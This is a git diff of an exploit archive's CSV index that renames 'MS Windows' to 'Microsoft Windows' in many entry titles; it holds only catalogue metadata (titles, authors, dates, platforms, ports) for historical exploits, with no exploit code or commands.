diff --git a/files.csv b/files.csv
index cc751bdb9..cc051b1f3 100755
--- a/files.csv
+++ b/files.csv
@@ -1,9 +1,9 @@
 id,file,description,date,author,platform,type,port
-1,platforms/windows/remote/1.c,"MS Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80
-2,platforms/windows/remote/2.c,"MS Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
+1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80
+2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
-5,platforms/windows/remote/5.c,"MS Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
+5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
 6,platforms/php/webapps/6.php,"WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit",2006-05-25,rgod,php,webapps,0
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
@@ -17,7 +17,7 @@ id,file,description,date,author,platform,type,port
 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service Exploit",2003-04-22,"Tom Ferris",windows,dos,0
 18,platforms/linux/remote/18.sh,"Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)",2003-04-23,truff,linux,remote,0
 19,platforms/linux/remote/19.c,"PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)",2003-04-25,blightninjas,linux,remote,1723
-20,platforms/windows/remote/20.txt,"MS Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
+20,platforms/windows/remote/20.txt,"Microsoft Windows SMB - Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Local Root Exploit",2003-04-29,Xpl017Elz,linux,local,0
 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service - Proof of Concept",2003-04-29,aT4r,windows,dos,0
 23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554
@@ -29,11 +29,11 @@ id,file,description,date,author,platform,type,port
 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit",2003-05-12,bob,bsd,local,0
 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0
 31,platforms/linux/local/31.pl,"CdRecord Version <= 2.0 - Mandrake local root exploit",2003-05-14,N/A,linux,local,0
-32,platforms/windows/local/32.c,"MS Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0
+32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0
 33,platforms/linux/remote/33.c,"WsMp3d 0.x Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000
 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80
-35,platforms/windows/dos/35.c,"MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
-36,platforms/windows/remote/36.c,"MS Windows WebDav II - (New) Remote Root Exploit",2003-06-01,alumni,windows,remote,80
+35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
+36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (new)",2003-06-01,alumni,windows,remote,80
 37,platforms/windows/remote/37.pl,"MS Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl",2003-06-08,"Matthew Murphy",linux,remote,80
 39,platforms/linux/remote/39.c,"Atftpd 0.6 - Remote Root Exploit (atftpdx.c)",2003-06-10,gunzip,linux,remote,69
@@ -45,40 +45,40 @@ id,file,description,date,author,platform,type,port
 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80
 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - Remote php File Include Exploit",2003-06-30,Spoofed,php,webapps,0
-48,platforms/windows/remote/48.c,"MS Windows Media Services Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
+48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
 50,platforms/windows/remote/50.pl,"ColdFusion MX Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
-51,platforms/windows/remote/51.c,"MS Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
+51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
 53,platforms/cgi/webapps/53.c,"CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)",2003-07-10,knight420,cgi,webapps,0
 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
 55,platforms/linux/remote/55.c,"Samba 2.2.8 (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
-56,platforms/windows/remote/56.c,"MS Windows Media Services (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80
+56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80
 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
 59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0
 60,platforms/hardware/dos/60.c,"Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c)",2003-07-21,"Martin Kluge",hardware,dos,0
-61,platforms/windows/dos/61.c,"MS Windows 2000 RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0
+61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0
 62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0
 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114
-64,platforms/windows/remote/64.c,"MS Windows (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135
-65,platforms/windows/dos/65.c,"MS Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
-66,platforms/windows/remote/66.c,"MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets)",2003-07-26,"H D Moore",windows,remote,135
+64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135
+65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0
+66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit",2003-07-26,"H D Moore",windows,remote,135
 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80
 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0
-69,platforms/windows/remote/69.c,"MS Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
-70,platforms/windows/remote/70.c,"MS Windows (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135
+69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135
+70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,N/A,windows,remote,135
 71,platforms/linux/local/71.c,"XGalaga 2.0.34 local game exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0
 72,platforms/linux/local/72.c,"xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0
 73,platforms/windows/dos/73.c,"Trillian 0.74 Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0
 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
 75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
-76,platforms/windows/remote/76.c,"MS Windows (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
+76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
-81,platforms/windows/remote/81.c,"MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
+81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
 82,platforms/windows/dos/82.c,"Piolet Client 1.05 Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
 83,platforms/windows/remote/83.html,"MS Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70
@@ -92,43 +92,43 @@ id,file,description,date,author,platform,type,port
 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 DoS",2003-09-08,badpack3t,multiple,dos,80
 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0
 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21
-97,platforms/windows/remote/97.c,"MS Windows (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135
+97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135
 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x Remote Exploit",2003-09-14,bkbll,linux,remote,3306
 99,platforms/linux/remote/99.c,"Pine <= 4.56 Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0
-100,platforms/windows/remote/100.c,"MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135
+100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135
 101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111
 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit",2003-09-20,N/A,linux,remote,617
-103,platforms/windows/remote/103.c,"MS Windows (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
+103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
 104,platforms/linux/local/104.c,"hztty 2.0 - Local root exploit (Tested on Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308
 106,platforms/linux/local/106.c,"IBM DB2 Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0
 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
-109,platforms/windows/remote/109.c,"MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
+109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
-111,platforms/windows/dos/111.c,"MS Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
+111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
 112,platforms/windows/remote/112.c,"mIRC 6.1 ""IRC"" Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0
 113,platforms/windows/dos/113.pl,"MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0
 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - Remote Denial of Service Exploit (wuftpd-freezer.c)",2003-10-31,"Angelo Rosiello",linux,dos,0
 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 Remote Exploit",2003-11-04,xCrZx,windows,remote,515
-117,platforms/windows/remote/117.c,"MS Windows XP/2000 RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135
+117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit",2003-11-07,ins1der,windows,remote,135
 118,platforms/bsd/local/118.c,"OpenBSD (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0
-119,platforms/windows/remote/119.c,"MS Windows 2000/XP Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
+119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 stack overflow local root exploit",2003-11-13,Li0n7,linux,local,0
 121,platforms/windows/remote/121.c,"MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
-122,platforms/windows/local/122.c,"MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0
-123,platforms/windows/remote/123.c,"MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
+122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0
+123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80
 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0
 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit",2003-11-20,xCrZx,linux,remote,80
 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0
 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - ""do_brk()"" Local Root Exploit (PoC)",2003-12-02,"Christophe Devine",linux,local,0
-130,platforms/windows/remote/130.c,"MS Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
+130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - (do_brk) Local Root Exploit (working)",2003-12-05,"Wojciech Purczynski",linux,local,0
 132,platforms/linux/remote/132.c,"Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80
 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80
 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0
-135,platforms/windows/remote/135.c,"MS Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
+135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0
 138,platforms/php/webapps/138.pl,"PHP-NUKE version <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
@@ -141,11 +141,11 @@ id,file,description,date,author,platform,type,port
 145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - mremap() Bound Checking Root Exploit",2004-01-15,"Paul Starzetz",linux,local,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
-148,platforms/windows/dos/148.sh,"MS Windows XP/2003 Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
+148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21
 151,platforms/windows/remote/151.txt,"MS Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local stack overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
-153,platforms/windows/dos/153.c,"MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
+153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
 156,platforms/windows/remote/156.c,"PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
@@ -167,7 +167,7 @@ id,file,description,date,author,platform,type,port
 173,platforms/linux/remote/173.pl,"Monit <= 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812
 174,platforms/linux/remote/174.c,"Monit <= 4.2 - Remote Root Buffer Overflow Exploit",2004-04-12,"Abhisek Datta",linux,remote,2812
 175,platforms/windows/remote/175.pl,"eMule <= 0.42d IRC Remote Buffer Overflow Exploit",2004-04-12,kingcope,windows,remote,0
-176,platforms/windows/dos/176.c,"MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0
+176,platforms/windows/dos/176.c,"Microsoft Windows IIS - SSL Remote Denial of Service Exploit (MS04-011)",2004-04-14,"David Barroso",windows,dos,0
 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - exploit",2000-11-15,keelis,cgi,webapps,0
 178,platforms/linux/local/178.c,"traceroute Local Root Exploit",2000-11-15,"Michel Kaempf",linux,local,0
 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0
@@ -202,7 +202,7 @@ id,file,description,date,author,platform,type,port
 211,platforms/cgi/webapps/211.c,"PHF - Buffer Overflow Exploit for Linux-x86",2000-12-01,proton,cgi,webapps,0
 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD Remote Buffer Overflow Exploit",2000-12-01,venglin,hp-ux,dos,0
 213,platforms/solaris/remote/213.c,"Solaris sadmind Remote Buffer Overflow Exploit",2000-12-01,Optyx,solaris,remote,111
-214,platforms/windows/dos/214.c,"MS Windows (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0
+214,platforms/windows/dos/214.c,"Microsoft Windows - (Jolt2.c) Denial of Service Exploit",2000-12-02,phonix,windows,dos,0
 215,platforms/linux/local/215.c,"mount exploit for glibc locale bug",2000-12-02,sk8,linux,local,0
 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0
 217,platforms/linux/local/217.c,"UUCP Exploit - file creation/overwriting (symlinks)",2000-12-04,t--zen,linux,local,0
@@ -250,16 +250,16 @@ id,file,description,date,author,platform,type,port
 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0
 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0
-266,platforms/windows/remote/266.c,"MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80
-268,platforms/windows/remote/268.c,"MS Windows 2000 sp1/sp2 isapi - .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
+266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit",2001-05-07,"Ryan Permeh",windows,remote,80
+268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow Exploit (2)",2001-05-08,"dark spyrit",windows,remote,80
 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) - Remote Root Exploit (Linux x86)",2001-05-08,qitest1,linux,remote,21
 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0
-271,platforms/windows/local/271.c,"MS Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
+271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0
 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
 273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0
 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
-275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
-276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
+275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
+276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53
 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
 280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
@@ -273,9 +273,9 @@ id,file,description,date,author,platform,type,port
 289,platforms/cgi/webapps/289.pl,"sendtemp.pl Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0
 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 ld_preload Local Exploit",2001-03-04,Shadow,linux,local,0
 291,platforms/linux/remote/291.c,"TCP Connection Reset Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
-293,platforms/windows/remote/293.c,"MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445
+293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445
 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000
-295,platforms/windows/remote/295.c,"MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
+295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit",2004-05-05,vade79,linux,remote,0
 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554
 298,platforms/windows/dos/298.pl,"Emule 0.42e Remote Denial of Service Exploit",2004-05-16,"Rafel Ivgi",windows,dos,80
@@ -303,7 +303,7 @@ id,file,description,date,author,platform,type,port
 324,platforms/windows/dos/324.txt,"Ping of Death Remote Denial of Service Exploit",1996-10-21,N/A,windows,dos,0
 325,platforms/linux/local/325.c,"BSD & Linux - lpr Command Local Root Exploit",1996-10-25,"Vadim Kolontsov",linux,local,0
 328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0
-329,platforms/windows/dos/329.txt,"MS Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0
+329,platforms/windows/dos/329.txt,"Microsoft Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0
 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0
